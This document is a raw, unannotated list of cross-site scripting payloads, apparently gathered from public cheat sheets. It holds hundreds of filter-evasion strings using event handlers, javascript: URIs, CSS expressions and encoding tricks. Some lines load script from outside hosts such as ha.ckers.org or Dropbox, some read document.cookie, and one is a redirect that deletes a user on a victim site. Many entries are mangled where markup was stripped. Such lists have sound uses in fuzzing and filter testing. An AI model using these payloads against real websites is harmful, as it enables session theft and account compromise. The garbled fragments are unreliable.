      <IMG SRC=\"jav
      ascript:alert('XSS');\">
      <IMG SRC=\"jav
      ascript:alert('XSS');\">
      <IMG SRC=\"jav ascript:alert('XSS');\">
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
      <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
      <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
      <IMG SRC=javascript:alert("XSS")>
      <IMG SRC=JaVaScRiPt:alert('XSS')>
      <IMG SRC=javascript:alert('XSS')>
      <IMG SRC=\"javascript:alert('XSS');\">
      <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
      '';!--\"<XSS>=&{()}
      ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
      ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
      '';!--"=&{()}

      alert("XSS")">

      <alert("XSS");//<
      a=/XSS/alert(a.source)
      \";alert('XSS');//
      alert("XSS");
      ¼script¾alert(¢XSS¢)¼/script¾




      @im\port'\ja\vasc\ript:alert("XSS")';

      exp/*

      a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

      document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
      TESTHTML5FORMACTION
      crosssitespt


      <img src="

      foo=">alert(1)">
      alert(1)">
      foo=">alert(1)">
      ({0:#0=alert/#0#/#0#(123)})
      ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
      Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
      {alert(1)};1
      crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
      alert(1)

      +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
      %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
      +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
      %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
      %253cscript%253ealert(document.cookie)%253c/script%253e
      “>alert(document.cookie)
      “>alert(document.cookie)
      “><alert(document.cookie);//<
      fooalert(document.cookie)
      ipt>alert(document.cookie)ipt>
      %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
      ‘; alert(document.cookie); var foo=’
      foo\’; alert(document.cookie);//’;
      alert(document.cookie)

      alert(1)
      ">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))

      ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
      '';!--"=&{()}
      0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"

      <marquee/onstart=alert()>
      <video/poster/onerror=alert()>
      <isindex/autofocus/onfocus=alert()>
      <SCRIPT SRC=http://ha.ckers.org/xss.js>

      xxs link
      xxs link
      alert("XSS")">

      <alert("XSS");//<

      <SCRIPT SRC=//ha.ckers.org/.j>
      <IMG SRC="javascript:alert('XSS')"
      <iframe src=http://ha.ckers.org/scriptlet.html <
      \";alert('XSS');//
      alert('XSS');
      alert("XSS");



      li {list-style-image: url("javascript:alert('XSS')");}

      • XSS


        @import'http://ha.ckers.org/xss.css';

        BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
        @im\port'\ja\vasc\ript:alert("XSS")';

        exp/*
        alert('XSS');
        .XSS{background-image:url("javascript:alert('XSS')");}

        BODY{background:url("javascript:alert('XSS')")}

        ¼script¾alert(¢XSS¢)¼/script¾




        echo('alert("XSS")'); ?>

        +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

        " SRC="http://ha.ckers.org/xss.js">

        '" SRC="http://ha.ckers.org/xss.js">
        ` SRC="http://ha.ckers.org/xss.js">

        document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
        XSS
        0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
        veris-->group
        element[attribute='
        [

        [" onmouseover="alert('RVRSH3LL_XSS');" ]
        %22;alert%28%27RVRSH3LL_XSS%29//
        javascript:alert%281%29;

        alert;pg("XSS")

        for((i)in(self))eval(i)(1)
        ipt>alert(1)ipt>ipt>alert(1)ipt>
        iPt>alert(1)IPt>
        test
        %253Cscript%253Ealert('XSS')%253C%252Fscript%253E

        ">

        ">123


        ">

        123

        ">

        123


        ">alert(`TEXT YOU WANT TO BE DISPLAYED`);

        123


        ">

        123


        >

        Hover the cursor to the LEFT of this Message

        &ParamHeight=250

        ">

        ">123


        ">

        123

        {font-family&colon;'<iframe/onload=confirm(1)>'
        <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
        <sVg><scRipt >alert&lpar;1&rpar; {Opera}
        <img/src=`` onerror=this.onerror=confirm(1)
        <form><isindex formaction="javascript&colon;confirm(1)"
        <img src=``&NewLine; onerror=alert(1)&NewLine;
        <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
        <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
        <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
        <script /**/>/**/alert(1)/**/</script /**/
        &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
        <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
        <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
        <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
        <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
        <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
        <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
        <form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
        <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
        <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
        <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
        http://www.google<script .com>alert(document.location)</script
        <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
        <img/src=@&#32;&#13; onerror = prompt('&#49;')
        <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
        <script ^__^>alert(String.fromCharCode(49))</script ^__^
        /**/alert(document.location)/**/

        /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
        X
        alert(0%0)

        <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
        <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
        &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
        &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
        <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
        <div/style="width:expression(confirm(1))">X</div> {IE7}
        <iframe// src=javaSCRIPT&colon;alert(1)
        //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
        /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
        //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
        </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

        |\>''alert&#x28;1&#x29; {Opera}
        <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
        <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
        <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
        <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
        <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
        <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
        <var onmouseover="prompt(1)">On Mouse Over</var>
        <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
        <img src="/" =_=" title="onerror='prompt(1)'">
        <%<!--'%><script>alert(1);

        X



        http://www.alert(1)
        alert(1)
        <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
        <img src=`xx:xx`onerror=alert(1)>
        <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
        <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
        <math><a xlink:href="//jsfiddle.net/t846h/">click
        <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
        <svg contentScriptType=text/vbs><script>MsgBox+1
        <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
        <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
        <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
        +-+-1-+-+alert(1)

        /*<script* */alert(1)//&NewLine;confirm(1);
        alert(1)
        <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
        <script x> alert(1) style="x:">
        <--` --!>

        x
        ">
        CLICKME
        click

        Click Me
        javascript:alert(1);
        '`"><\x3Cscript>javascript:alert(1)
        '`"><\x00script>javascript:alert(1)

        \x3Cscript>javascript:alert(1)
        '"`>/* *\x2Fjavascript:alert(1)// */
        javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)

        --> -->
        -->
        -->
        -->
        `"'>

        a='hello\x27;javascript:alert(1)//';


        /* *\x2A/javascript:alert(1)// */
        /* *\x00/javascript:alert(1)// */

        "'`>ABC

        DEF
        "'`>ABC
        DEF
        if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
        if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
        if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
        '`"><\x3Cscript>javascript:alert(1)
        '`"><\x00script>javascript:alert(1)
        "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
        "'`><\x00img src=xxx:x onerror=javascript:alert(1)>

        "`'>\x3Bjavascript:alert(1)
        "`'>\x0Djavascript:alert(1)
        "`'>\xEF\xBB\xBFjavascript:alert(1)
        "`'>\xE2\x80\x81javascript:alert(1)
        "`'>\xE2\x80\x84javascript:alert(1)
        "`'>\xE3\x80\x80javascript:alert(1)
        "`'>\x09javascript:alert(1)
        "`'>\xE2\x80\x89javascript:alert(1)
        "`'>\xE2\x80\x85javascript:alert(1)
        "`'>\xE2\x80\x88javascript:alert(1)
        "`'>\x00javascript:alert(1)
        "`'>\xE2\x80\xA8javascript:alert(1)
        "`'>\xE2\x80\x8Ajavascript:alert(1)
        "`'>\xE1\x9A\x80javascript:alert(1)
        "`'>\x0Cjavascript:alert(1)
        "`'>\x2Bjavascript:alert(1)
        "`'>\xF0\x90\x96\x9Ajavascript:alert(1)
        "`'>-javascript:alert(1)
        "`'>\x0Ajavascript:alert(1)
        "`'>\xE2\x80\xAFjavascript:alert(1)
        "`'>\x7Ejavascript:alert(1)
        "`'>\xE2\x80\x87javascript:alert(1)
        "`'>\xE2\x81\x9Fjavascript:alert(1)
        "`'>\xE2\x80\xA9javascript:alert(1)
        "`'>\xC2\x85javascript:alert(1)
        "`'>\xEF\xBF\xAEjavascript:alert(1)
        "`'>\xE2\x80\x83javascript:alert(1)
        "`'>\xE2\x80\x8Bjavascript:alert(1)
        "`'>\xEF\xBF\xBEjavascript:alert(1)
        "`'>\xE2\x80\x80javascript:alert(1)
        "`'>\x21javascript:alert(1)
        "`'>\xE2\x80\x82javascript:alert(1)
        "`'>\xE2\x80\x86javascript:alert(1)
        "`'>\xE1\xA0\x8Ejavascript:alert(1)
        "`'>\x0Bjavascript:alert(1)
        "`'>\x20javascript:alert(1)
        "`'>\xC2\xA0javascript:alert(1)
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        "/>
        javascript:alert(1)<\x00/script>
        <img src=# onerror\x3D"javascript:alert(1)" >
        <input onfocus=javascript:alert(1) autofocus>
        <input onblur=javascript:alert(1) autofocus><input autofocus>
        <video poster=javascript:javascript:alert(1)//
        <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
        <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
        <video><source onerror="javascript:javascript:alert(1)">
        <video onerror="javascript:javascript:alert(1)"><source>
        <form><button formaction="javascript:javascript:alert(1)">X
        <body oninput=javascript:alert(1)><input autofocus>
        <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
        <frameset onload=javascript:alert(1)>
        <table background="javascript:javascript:alert(1)">
        <!--<img src="--><img src=x onerror=javascript:alert(1)//">
        <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
        <![><img src="]><img src=x onerror=javascript:alert(1)//">
        <style><img src="</style><img src=x onerror=javascript:alert(1)//">
        <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
        <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
        <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)

        alert(1)0


        document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

        <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
        <? foo="><script>javascript:alert(1)">
        javascript:alert(1)">
        foo=">javascript:alert(1)">
        foo=">">

        <% foo>

        d.innerHTML=d.innerHTML

        XXX

        javascript:alert(1)//"

        `><img src=x:x onerror=javascript:alert(1)></a>


        X
        p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
        @import "data:,*%7bx:expression(javascript:alert(1))%7D";
        XXXXXX
        *[{}@import'%(css)s?]X

        XXX
        XXX
        / style=x:expression\28javascript:alert(1)\29>
        *{x:expression(javascript:alert(1))}

        X
        X
        with(document.getElementById("d"))innerHTML=innerHTML
        X
        X
        XXX
        #x{font-family:foo[bar;color:green;} #y];color:red;{}
        XXX
        ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
        ({0:#0=eval/#0#/#0#(javascript:alert(1))})
        ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
        Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
        &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
        &alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
        <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
        X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
        1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
        1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
        <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
        1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
        <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
        <x style="behavior:url(%(sct)s)">
        <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
        <event-source src="%(event)s" onload="javascript:alert(1)">
        <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
        <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
        <script>%(payload)s

        javascript:alert(1)


        <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
        <BODY ONLOAD=javascript:alert(1)>
        <BODY ONLOAD=javascript:javascript:alert(1)>
        <IMG SRC="jav ascript:javascript:alert(1);">
        <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
        <SCRIPT/SRC="%(jscript)s">
        <%(payload)s//<



        @import'%(css)s';

        li {list-style-image: url("javascript:javascript:alert(1)");}

        • XSS



          javascript:alert(1);
          .XSS{background-image:url("javascript:javascript:alert(1)");}
          BODY{background:url("javascript:javascript:alert(1)")}

          XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">

          +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
          X

          @import'%(css)s';
          a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
          &&javascript:alert(1)&&;&&<&&/script&&>
          <SCRIPT onreadystatechange=javascript:javascript:alert(1);>

          javascript:alert(1);

          ]]

          test1
          test1

          ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
          alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
          >">'>alert(String.fromCharCode(88,83,83))
          '';!--"=&{()}






          xxs link
          xxs link
          alert("XSS")">

          perl -e 'print "";' > out

          <alert("XSS");//<

          <SCRIPT SRC=//ha.ckers.org/.j>
          <IMG SRC="javascript:alert('XSS')"
          <iframe src=http://ha.ckers.org/scriptlet.html <
          \";alert('XSS');//
          </TITLE><SCRIPT>alert("XSS");



          li {list-style-image: url("javascript:alert('XSS')");}

          • XSS


            @import'http://ha.ckers.org/xss.css';

            BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
            @im\port'\ja\vasc\ript:alert("XSS")';

            exp/*
            alert('XSS');
            .XSS{background-image:url("javascript:alert('XSS')");}

            BODY{background:url("javascript:alert('XSS')")}
            BODY{background:url("javascript:alert('XSS')")}

            ¼script¾alert(¢XSS¢)¼/script¾




            echo('alert("XSS")'); ?>

            Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

            +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

            " SRC="http://ha.ckers.org/xss.js">

            '" SRC="http://ha.ckers.org/xss.js">
            ` SRC="http://ha.ckers.org/xss.js">

            document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
            XSS

            {font-family&colon;'<iframe/onload=confirm(1)>'
            <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
            <sVg><scRipt >alert&lpar;1&rpar; {Opera}
            <img/src=`` onerror=this.onerror=confirm(1)
            <form><isindex formaction="javascript&colon;confirm(1)"
            <img src=``&NewLine; onerror=alert(1)&NewLine;
            <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
            <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
            <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
            <script /**/>/**/alert(1)/**/</script /**/
            &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
            <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
            <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
            <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
            <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
            <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
            <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
            <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
            </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
            <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
            <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
            <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
            http://www.google<script .com>alert(document.location)</script
            <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
            <img/src=@&#32;&#13; onerror = prompt('&#49;')
            <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
            <script ^__^>alert(String.fromCharCode(49))</script ^__^
            /**/alert(document.location)/**/

            /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
            X
            alert(0%0)

            <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
            <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
            &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
            &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
            <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
            <div/style="width:expression(confirm(1))">X</div> {IE7}
            <iframe// src=javaSCRIPT&colon;alert(1)
            //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
            /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
            //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
            </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

            |\>''alert&#x28;1&#x29; {Opera}
            <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
            <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
            <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
            <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
            <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
            <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
            <var onmouseover="prompt(1)">On Mouse Over</var>
            <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
            <img src="/" =_=" title="onerror='prompt(1)'">
            <%<!--'%><script>alert(1);

            X

            click

            MsgBox+1
            <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
            <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
            <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
            +-+-1-+-+alert(1)

            /*<script* */alert(1)//&NewLine;confirm(1);
            alert(1)
            <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
            <script x> alert(1) style="x:">
            <--` --!>

            x
            ">
            CLICKME
            click

            Click Me
            '';!--"=&{()}
            '>//\\,<'>">">"*"
            '); alert('XSS
            alert(1);
            alert('XSS');




            alert("XSS")">
            ipt>alert('XSS');ipt>
            alert(String.fromCharCode(88,83,83))

            @im\port'\ja\vasc\ript:alert(\"XSS\")';
            echo('alert(\"XSS\")'); ?>
            alert('XSS')




            ">alert(0)

            alert(/xss/)
            alert(/xss/)


            alert('XSS')

            >
            window.alert("Bonjour !");


            onload=alert('XSS')>
            ">
            '>><marquee><h1>XSS</h1></marquee>
            '">><script>alert('XSS')
            '">>

            XSS

            var var = 1; alert(var)
            BODY{background:url("javascript:alert('XSS')")}
            ='alert("XSS")'?>

            " onfocus=alert(document.domain) "> <"

            li {list-style-image: url(\"javascript:alert('XSS')\");}

            • XSS
              perl -e 'print \"alert(\"XSS\")\";' > out
              perl -e 'print \"\";' > out


              alert(1)

              alert(1)
              ">
              [color=red width=expression(alert(123))][color]

              Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
              ">alert(123)

              '">alert(1111)
              '">alert(document.cookie)
              '""> alert('X \nS \nS');
              <<<<>>>><<<script>alert(123)
              (123)(123)

              '>alert(123)
              '>">
              }a=eval;b=alert;a(b(/XSS/.source));
              document.write("XSS");
              a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
              ='>alert("xss")
              "+src="http://yoursite.com/xss.js?69,69">
              alert(navigator.userAgent)>
              ">/XaDoS/>alert(document.cookie)
              ">/KinG-InFeT.NeT/>alert(document.cookie)
              src="http://www.site.com/XSS.js">
              data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
              !--" />alert('xss');
              alert("XSS by \nxss")

              XSS by xss


              ">alert("XSS by \nxss")>

              XSS by xss


              '">alert("XSS by \nxss")>

              XSS by xss


              alert("XSS by \nxss")

              XSS by xss


              alert(1337)

              XSS by xss


              ">alert(1337)">alert("XSS by \nxss</h1></marquee>
              '"></title><script>alert(1337)>

              XSS by xss


              XSS by xss


              '>alert(String.fromCharCode(88,83,83))
<br />"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
<br />\alert(String.fromCharCode(88,83,83))\'alert(String.fromCharCode(88,83,83));
              >"><ScRiPt%20%0a%0d>alert(561177485777)%3B

              alert(“XSS”);




              ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
              '';!--"<XSS>=&{()}
              <SCRIPT>alert('XSS')</SCRIPT>
              <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
              <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
              <BASE HREF="javascript:alert('XSS');//">
              <BGSOUND SRC="javascript:alert('XSS');">
              <BODY BACKGROUND="javascript:alert('XSS');">
              <BODY ONLOAD=alert('XSS')>
              <DIV STYLE="background-image: url(javascript:alert('XSS'))">
              <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
              <DIV STYLE="width: expression(alert('XSS'));">
              <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
              <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
              <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
              <IMG SRC="javascript:alert('XSS');">
              <IMG SRC=javascript:alert('XSS')>
              <IMG DYNSRC="javascript:alert('XSS');">
              <IMG LOWSRC="javascript:alert('XSS');">
              <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
              Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
              exp/*<XSS STYLE='no\xss:noxss("*//*");
              <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
              <IMG SRC='vbscript:msgbox("XSS")'>
              <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
              <IMG SRC="livescript:[code]">
              %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
              <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
              <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
              <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
              <IMG SRC="mocha:[code]">
              <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
              <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
              <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
              a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
              eval(a+b+c+d);
              <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
